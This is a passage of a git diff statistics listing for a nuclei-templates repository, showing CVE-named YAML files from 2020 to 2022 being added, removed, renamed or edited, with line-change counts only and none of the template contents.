cve-2020-24571.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-24589.yaml | 34 + ...VE-2020-25223.yaml => cve-2020-25223.yaml} | 0 ...{CVE-2020-2551.yaml => cve-2020-2551.yaml} | 0 ...VE-2020-26073.yaml => cve-2020-26073.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-26876.yaml | 15 +- nuclei-templates/CVE-2020/cve-2020-28351.yaml | 36 + nuclei-templates/CVE-2020/cve-2020-35338.yaml | 33 + ...VE-2020-35713.yaml => cve-2020-35713.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-35749.yaml | 55 + ...{CVE-2020-3580.yaml => cve-2020-3580.yaml} | 0 ...VE-2020-35951.yaml => cve-2020-35951.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-36287.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-36365.yaml | 31 - nuclei-templates/CVE-2020/cve-2020-5307.yaml | 35 + nuclei-templates/CVE-2020/cve-2020-7247.yaml | 44 + nuclei-templates/CVE-2020/cve-2020-7943.yaml | 51 + ...{CVE-2020-7980.yaml => cve-2020-7980.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-8515.yaml | 35 + 
nuclei-templates/CVE-2020/cve-2020-8644.yaml | 40 +- nuclei-templates/CVE-2020/cve-2020-8771.yaml | 55 + nuclei-templates/CVE-2020/cve-2020-8772.yaml | 86 +- ...{CVE-2020-8982.yaml => cve-2020-8982.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-9043.yaml | 34 +- ...{CVE-2020-9047.yaml => cve-2020-9047.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-9402.yaml | 31 + nuclei-templates/CVE-2020/cve-2020-9496.yaml | 44 + ...{CVE-20200924a.yaml => cve-20200924a.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-1472.yaml | 22 +- ...{cve-2021-1497.yaml => CVE-2021-1497.yaml} | 0 ...ve-2021-20038.yaml => CVE-2021-20038.yaml} | 0 ...ve-2021-20114.yaml => CVE-2021-20114.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-20150.yaml | 65 + nuclei-templates/CVE-2021/CVE-2021-20323.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-20837.yaml | 66 +- nuclei-templates/CVE-2021/CVE-2021-21087.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-21311.yaml | 69 + nuclei-templates/CVE-2021/CVE-2021-21345.yaml | 16 +- nuclei-templates/CVE-2021/CVE-2021-21351.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-21402.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-21799.yaml | 12 +- nuclei-templates/CVE-2021/CVE-2021-21800.yaml | 43 - ...ve-2021-21801.yaml => CVE-2021-21801.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-21802.yaml | 12 +- ...ve-2021-21803.yaml => CVE-2021-21803.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-21805.yaml | 28 +- nuclei-templates/CVE-2021/CVE-2021-21816.yaml | 30 - ...ve-2021-21975.yaml => CVE-2021-21975.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-22054.yaml | 14 +- nuclei-templates/CVE-2021/CVE-2021-22214.yaml | 27 - nuclei-templates/CVE-2021/CVE-2021-22707.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-22911.yaml | 21 +- nuclei-templates/CVE-2021/CVE-2021-24145.yaml | 25 +- nuclei-templates/CVE-2021/CVE-2021-24150.yaml | 24 +- nuclei-templates/CVE-2021/CVE-2021-24155.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24165.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-24169.yaml | 11 +- 
nuclei-templates/CVE-2021/CVE-2021-24182.yaml | 41 +- nuclei-templates/CVE-2021/CVE-2021-24214.yaml | 34 +- nuclei-templates/CVE-2021/CVE-2021-24215.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-24226.yaml | 29 - nuclei-templates/CVE-2021/CVE-2021-24227.yaml | 20 +- nuclei-templates/CVE-2021/CVE-2021-24236.yaml | 17 +- nuclei-templates/CVE-2021/CVE-2021-24239.yaml | 25 +- nuclei-templates/CVE-2021/CVE-2021-24245.yaml | 45 - ...ve-2021-24274.yaml => CVE-2021-24274.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24284.yaml | 33 +- ...ve-2021-24285.yaml => CVE-2021-24285.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24286.yaml | 3 - nuclei-templates/CVE-2021/CVE-2021-24287.yaml | 11 +- ...ve-2021-24291.yaml => CVE-2021-24291.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24300.yaml | 5 - ...ve-2021-24335.yaml => CVE-2021-24335.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24347.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24351.yaml | 12 +- nuclei-templates/CVE-2021/CVE-2021-24370.yaml | 55 + nuclei-templates/CVE-2021/CVE-2021-24385.yaml | 39 +- nuclei-templates/CVE-2021/CVE-2021-24409.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24435.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-24436.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-24442.yaml | 70 +- nuclei-templates/CVE-2021/CVE-2021-24452.yaml | 8 +- ...ve-2021-24472.yaml => CVE-2021-24472.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24488.yaml | 45 - ...ve-2021-24495.yaml => CVE-2021-24495.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24507.yaml | 79 +- nuclei-templates/CVE-2021/CVE-2021-24510.yaml | 48 - nuclei-templates/CVE-2021/CVE-2021-24554.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-24627.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-24647.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24666.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24731.yaml | 69 +- ...ve-2021-24750.yaml => CVE-2021-24750.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24791.yaml | 6 +- 
nuclei-templates/CVE-2021/CVE-2021-24827.yaml | 20 +- nuclei-templates/CVE-2021/CVE-2021-24849.yaml | 84 +- nuclei-templates/CVE-2021/CVE-2021-24862.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-24875.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24891.yaml | 14 +- nuclei-templates/CVE-2021/CVE-2021-24910.yaml | 32 + nuclei-templates/CVE-2021/CVE-2021-24915.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24917.yaml | 32 +- nuclei-templates/CVE-2021/CVE-2021-24926.yaml | 56 + nuclei-templates/CVE-2021/CVE-2021-24931.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24940.yaml | 25 +- nuclei-templates/CVE-2021/CVE-2021-24943.yaml | 71 +- nuclei-templates/CVE-2021/CVE-2021-24946.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-24947.yaml | 56 + nuclei-templates/CVE-2021/CVE-2021-24956.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-24970.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-24979.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-24991.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-25003.yaml | 40 +- nuclei-templates/CVE-2021/CVE-2021-25016.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-25052.yaml | 44 - nuclei-templates/CVE-2021/CVE-2021-25055.yaml | 52 - nuclei-templates/CVE-2021/CVE-2021-25063.yaml | 28 +- nuclei-templates/CVE-2021/CVE-2021-25065.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-25067.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-25074.yaml | 42 + nuclei-templates/CVE-2021/CVE-2021-25075.yaml | 53 + nuclei-templates/CVE-2021/CVE-2021-25078.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-25079.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-25085.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-25099.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-25104.yaml | 24 +- nuclei-templates/CVE-2021/CVE-2021-25111.yaml | 41 + nuclei-templates/CVE-2021/CVE-2021-25112.yaml | 49 - nuclei-templates/CVE-2021/CVE-2021-25114.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-25118.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-25120.yaml | 50 - 
nuclei-templates/CVE-2021/CVE-2021-25296.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-25297.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-25298.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-25299.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-25899.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-26085.yaml | 11 +- ...ve-2021-26086.yaml => CVE-2021-26086.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-26292.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-26294.yaml | 15 +- nuclei-templates/CVE-2021/CVE-2021-26598.yaml | 57 - nuclei-templates/CVE-2021/CVE-2021-26702.yaml | 31 + nuclei-templates/CVE-2021/CVE-2021-26754.yaml | 41 +- nuclei-templates/CVE-2021/CVE-2021-27124.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27309.yaml | 44 - ...ve-2021-27310.yaml => CVE-2021-27310.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-27314.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27315.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27316.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27319.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27320.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-27519.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-27520.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27670.yaml | 14 +- nuclei-templates/CVE-2021/CVE-2021-27909.yaml | 21 +- ...ve-2021-27931.yaml => CVE-2021-27931.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-28377.yaml | 30 - nuclei-templates/CVE-2021/CVE-2021-28419.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-29006.yaml | 6 +- ...ve-2021-29484.yaml => CVE-2021-29484.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-29505.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-3002.yaml | 39 +- ...ve-2021-30049.yaml => CVE-2021-30049.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-30128.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-30134.yaml | 24 +- nuclei-templates/CVE-2021/CVE-2021-30175.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-30461.yaml | 4 - nuclei-templates/CVE-2021/CVE-2021-3110.yaml | 22 +- 
nuclei-templates/CVE-2021/CVE-2021-31195.yaml | 32 +- ...ve-2021-31755.yaml => CVE-2021-31755.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-31800.yaml | 22 - nuclei-templates/CVE-2021/CVE-2021-31805.yaml | 3 - ...ve-2021-32618.yaml => CVE-2021-32618.yaml} | 0 ...ve-2021-32682.yaml => CVE-2021-32682.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-32789.yaml | 19 +- nuclei-templates/CVE-2021/CVE-2021-32853.yaml | 30 +- ...{cve-2021-3297.yaml => CVE-2021-3297.yaml} | 0 ...ve-2021-33044.yaml => CVE-2021-33044.yaml} | 0 ...ve-2021-33357.yaml => CVE-2021-33357.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-33690.yaml | 10 +- ...{cve-2021-3377.yaml => CVE-2021-3377.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-33851.yaml | 30 +- nuclei-templates/CVE-2021/CVE-2021-34640.yaml | 61 + nuclei-templates/CVE-2021/CVE-2021-34643.yaml | 38 +- nuclei-templates/CVE-2021/CVE-2021-35250.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-35323.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-35380.yaml | 20 +- nuclei-templates/CVE-2021/CVE-2021-35395.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-35488.yaml | 21 +- nuclei-templates/CVE-2021/CVE-2021-35587.yaml | 43 - nuclei-templates/CVE-2021/CVE-2021-36356.yaml | 32 +- nuclei-templates/CVE-2021/CVE-2021-36450.yaml | 55 + ...{cve-2021-3654.yaml => CVE-2021-3654.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-36580.yaml | 10 +- ...ve-2021-36749.yaml => CVE-2021-36749.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-36873.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-36880.yaml | 39 +- nuclei-templates/CVE-2021/CVE-2021-37304.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-37305.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-37416.yaml | 38 + nuclei-templates/CVE-2021/CVE-2021-37859.yaml | 5 - ...ve-2021-38751.yaml => CVE-2021-38751.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-39141.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-39144.yaml | 17 +- nuclei-templates/CVE-2021/CVE-2021-39146.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-39152.yaml | 8 +- 
nuclei-templates/CVE-2021/CVE-2021-39165.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-39211.yaml | 38 - nuclei-templates/CVE-2021/CVE-2021-39322.yaml | 38 +- ...ve-2021-39433.yaml => CVE-2021-39433.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-40149.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-40150.yaml | 33 + nuclei-templates/CVE-2021/CVE-2021-40323.yaml | 99 - nuclei-templates/CVE-2021/CVE-2021-40661.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-40822.yaml | 39 +- nuclei-templates/CVE-2021/CVE-2021-40908.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-40968.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40969.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40970.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40971.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40972.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40973.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-41192.yaml | 27 +- ...ve-2021-41349.yaml => CVE-2021-41349.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41432.yaml | 41 +- nuclei-templates/CVE-2021/CVE-2021-41460.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-41569.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-41691.yaml | 53 + nuclei-templates/CVE-2021/CVE-2021-41749.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-42063.yaml | 46 - nuclei-templates/CVE-2021/CVE-2021-42071.yaml | 34 - nuclei-templates/CVE-2021/CVE-2021-42627.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-42663.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-42667.yaml | 24 +- nuclei-templates/CVE-2021/CVE-2021-42887.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-43062.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-43421.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-43510.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-43574.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-43725.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-43734.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-44077.yaml | 36 - nuclei-templates/CVE-2021/CVE-2021-44103.yaml | 14 +- 
nuclei-templates/CVE-2021/CVE-2021-44138.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-44139.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-44152.yaml | 21 +- nuclei-templates/CVE-2021/CVE-2021-44515.yaml | 39 + nuclei-templates/CVE-2021/CVE-2021-44528.yaml | 6 +- ...ve-2021-44848.yaml => CVE-2021-44848.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-45380.yaml | 25 +- nuclei-templates/CVE-2021/CVE-2021-45382.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-45422.yaml | 21 +- nuclei-templates/CVE-2021/CVE-2021-45428.yaml | 48 - nuclei-templates/CVE-2021/CVE-2021-46068.yaml | 28 +- nuclei-templates/CVE-2021/CVE-2021-46069.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-46071.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-46072.yaml | 28 +- nuclei-templates/CVE-2021/CVE-2021-46073.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-46107.yaml | 12 +- nuclei-templates/CVE-2021/CVE-2021-46379.yaml | 33 - nuclei-templates/CVE-2021/CVE-2021-46381.yaml | 29 - nuclei-templates/CVE-2021/CVE-2021-46418.yaml | 50 + nuclei-templates/CVE-2021/CVE-2021-46419.yaml | 52 + nuclei-templates/CVE-2021/CVE-2021-46422.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-46424.yaml | 7 +- nuclei-templates/CVE-2021/CVE-2021-46704.yaml | 10 +- ...VE-2021-20031.yaml => cve-2021-20031.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-20123.yaml | 30 +- ...VE-2021-20124.yaml => cve-2021-20124.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-20137.yaml | 33 +- nuclei-templates/CVE-2021/cve-2021-20150.yaml | 56 - nuclei-templates/CVE-2021/cve-2021-20158.yaml | 35 +- ...VE-2021-20167.yaml => cve-2021-20167.yaml} | 0 ...VE-2021-20792.yaml => cve-2021-20792.yaml} | 0 ...VE-2021-21307.yaml => cve-2021-21307.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-21311.yaml | 34 - nuclei-templates/CVE-2021/cve-2021-21402.yaml | 36 + nuclei-templates/CVE-2021/cve-2021-21745.yaml | 21 +- nuclei-templates/CVE-2021/cve-2021-21800.yaml | 53 + nuclei-templates/CVE-2021/cve-2021-21816.yaml | 33 + ...VE-2021-21973.yaml => 
cve-2021-21973.yaml} | 0 ...VE-2021-21978.yaml => cve-2021-21978.yaml} | 0 ...VE-2021-22053.yaml => cve-2021-22053.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-22214.yaml | 33 + nuclei-templates/CVE-2021/cve-2021-22502.yaml | 59 +- nuclei-templates/CVE-2021/cve-2021-24226.yaml | 33 + ...VE-2021-24235.yaml => cve-2021-24235.yaml} | 0 ...VE-2021-24237.yaml => cve-2021-24237.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24245.yaml | 73 + ...VE-2021-24288.yaml => cve-2021-24288.yaml} | 0 ...VE-2021-24298.yaml => cve-2021-24298.yaml} | 0 ...VE-2021-24316.yaml => cve-2021-24316.yaml} | 0 ...VE-2021-24320.yaml => cve-2021-24320.yaml} | 0 ...VE-2021-24340.yaml => cve-2021-24340.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24370.yaml | 44 - ...VE-2021-24389.yaml => cve-2021-24389.yaml} | 0 ...VE-2021-24406.yaml => cve-2021-24406.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24488.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-24510.yaml | 60 + ...VE-2021-24746.yaml => cve-2021-24746.yaml} | 0 ...VE-2021-24762.yaml => cve-2021-24762.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24910.yaml | 45 - nuclei-templates/CVE-2021/cve-2021-24926.yaml | 43 - nuclei-templates/CVE-2021/cve-2021-24947.yaml | 41 - ...VE-2021-24987.yaml => cve-2021-24987.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24991.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-25008.yaml | 24 +- nuclei-templates/CVE-2021/cve-2021-25033.yaml | 22 +- nuclei-templates/CVE-2021/cve-2021-25052.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-25055.yaml | 62 + nuclei-templates/CVE-2021/cve-2021-25074.yaml | 25 - nuclei-templates/CVE-2021/cve-2021-25075.yaml | 63 - nuclei-templates/CVE-2021/cve-2021-25085.yaml | 54 + nuclei-templates/CVE-2021/cve-2021-25111.yaml | 29 - nuclei-templates/CVE-2021/cve-2021-25112.yaml | 62 + nuclei-templates/CVE-2021/cve-2021-25118.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-25120.yaml | 60 + ...VE-2021-25281.yaml => cve-2021-25281.yaml} | 0 ...VE-2021-25646.yaml => cve-2021-25646.yaml} | 0 
...VE-2021-26247.yaml => cve-2021-26247.yaml} | 0 ...VE-2021-26475.yaml => cve-2021-26475.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-26598.yaml | 66 + nuclei-templates/CVE-2021/cve-2021-26702.yaml | 39 - nuclei-templates/CVE-2021/cve-2021-27309.yaml | 53 + nuclei-templates/CVE-2021/cve-2021-27519.yaml | 55 + ...VE-2021-27561.yaml => cve-2021-27561.yaml} | 0 ...VE-2021-27748.yaml => cve-2021-27748.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-28377.yaml | 45 + ...VE-2021-29203.yaml => cve-2021-29203.yaml} | 0 ...VE-2021-29490.yaml => cve-2021-29490.yaml} | 0 ...VE-2021-29622.yaml => cve-2021-29622.yaml} | 0 ...{CVE-2021-3019.yaml => cve-2021-3019.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-31800.yaml | 23 + ...{CVE-2021-3223.yaml => cve-2021-3223.yaml} | 0 ...VE-2021-32305.yaml => cve-2021-32305.yaml} | 0 ...VE-2021-32819.yaml => cve-2021-32819.yaml} | 0 ...VE-2021-33544.yaml => cve-2021-33544.yaml} | 0 ...VE-2021-33564.yaml => cve-2021-33564.yaml} | 0 ...{CVE-2021-3374.yaml => cve-2021-3374.yaml} | 0 ...VE-2021-33904.yaml => cve-2021-33904.yaml} | 0 ...VE-2021-34370.yaml => cve-2021-34370.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-34640.yaml | 48 - ...VE-2021-34805.yaml => cve-2021-34805.yaml} | 0 ...VE-2021-35265.yaml => cve-2021-35265.yaml} | 0 ...VE-2021-35464.yaml => cve-2021-35464.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-35587.yaml | 59 + ...VE-2021-36260.yaml => cve-2021-36260.yaml} | 0 ...VE-2021-36380.yaml => cve-2021-36380.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-36450.yaml | 65 - ...VE-2021-37216.yaml => cve-2021-37216.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-37416.yaml | 45 - ...VE-2021-37538.yaml => cve-2021-37538.yaml} | 0 ...VE-2021-37589.yaml => cve-2021-37589.yaml} | 0 ...VE-2021-37704.yaml => cve-2021-37704.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-39211.yaml | 48 + ...VE-2021-39226.yaml => cve-2021-39226.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-39312.yaml | 20 +- ...VE-2021-39320.yaml => cve-2021-39320.yaml} | 0 
...VE-2021-39327.yaml => cve-2021-39327.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-40150.yaml | 42 - nuclei-templates/CVE-2021/cve-2021-40323.yaml | 109 + ...VE-2021-40438.yaml => cve-2021-40438.yaml} | 0 ...VE-2021-40859.yaml => cve-2021-40859.yaml} | 0 ...VE-2021-40870.yaml => cve-2021-40870.yaml} | 0 ...VE-2021-41277.yaml => cve-2021-41277.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-41282.yaml | 49 +- ...VE-2021-41293.yaml => cve-2021-41293.yaml} | 0 ...VE-2021-41649.yaml => cve-2021-41649.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-41691.yaml | 51 - nuclei-templates/CVE-2021/cve-2021-41773.yaml | 47 + ...VE-2021-41826.yaml => cve-2021-41826.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-4191.yaml | 24 +- nuclei-templates/CVE-2021/cve-2021-42063.yaml | 57 + nuclei-templates/CVE-2021/cve-2021-42071.yaml | 49 + ...VE-2021-42192.yaml => cve-2021-42192.yaml} | 0 ...VE-2021-42258.yaml => cve-2021-42258.yaml} | 0 ...VE-2021-42551.yaml => cve-2021-42551.yaml} | 0 ...VE-2021-42565.yaml => cve-2021-42565.yaml} | 0 ...VE-2021-42566.yaml => cve-2021-42566.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-43062.yaml | 54 + nuclei-templates/CVE-2021/cve-2021-44077.yaml | 46 + nuclei-templates/CVE-2021/cve-2021-44515.yaml | 44 - ...VE-2021-45043.yaml => cve-2021-45043.yaml} | 0 ...VE-2021-45232.yaml => cve-2021-45232.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-45428.yaml | 56 + nuclei-templates/CVE-2021/cve-2021-45967.yaml | 29 +- ...VE-2021-46005.yaml => cve-2021-46005.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-46379.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-46381.yaml | 43 + ...VE-2021-46387.yaml => cve-2021-46387.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-46417.yaml | 20 +- nuclei-templates/CVE-2021/cve-2021-46422.yaml | 54 + nuclei-templates/CVE-2022/CVE-2022-0140.yaml | 43 - nuclei-templates/CVE-2022/CVE-2022-0147.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-0148.yaml | 48 - nuclei-templates/CVE-2022/CVE-2022-0149.yaml | 62 + 
nuclei-templates/CVE-2022/CVE-2022-0150.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-0165.yaml | 26 + nuclei-templates/CVE-2022/CVE-2022-0169.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0189.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-0206.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0212.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-0220.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-0228.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0234.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-0271.yaml | 32 - nuclei-templates/CVE-2022/CVE-2022-0281.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-0288.yaml | 42 +- nuclei-templates/CVE-2022/CVE-2022-0342.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-0349.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0381.yaml | 69 + nuclei-templates/CVE-2022/CVE-2022-0412.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-0415.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0422.yaml | 41 + nuclei-templates/CVE-2022/CVE-2022-0434.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0437.yaml | 51 - nuclei-templates/CVE-2022/CVE-2022-0441.yaml | 56 +- nuclei-templates/CVE-2022/CVE-2022-0482.yaml | 54 +- nuclei-templates/CVE-2022/CVE-2022-0513.yaml | 39 +- nuclei-templates/CVE-2022/CVE-2022-0533.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-0535.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-0543.yaml | 4 - nuclei-templates/CVE-2022/CVE-2022-0594.yaml | 45 - nuclei-templates/CVE-2022/CVE-2022-0597.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-0599.yaml | 41 + nuclei-templates/CVE-2022/CVE-2022-0651.yaml | 7 +- nuclei-templates/CVE-2022/CVE-2022-0653.yaml | 37 - nuclei-templates/CVE-2022/CVE-2022-0656.yaml | 44 - nuclei-templates/CVE-2022/CVE-2022-0658.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0678.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-0679.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0692.yaml | 31 +- nuclei-templates/CVE-2022/CVE-2022-0693.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0735.yaml | 19 +- 
nuclei-templates/CVE-2022/CVE-2022-0747.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-0760.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-0769.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0773.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0776.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-0781.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0784.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0785.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0786.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0787.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0788.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0814.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0817.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0824.yaml | 41 +- nuclei-templates/CVE-2022/CVE-2022-0826.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-0827.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0846.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0864.yaml | 9 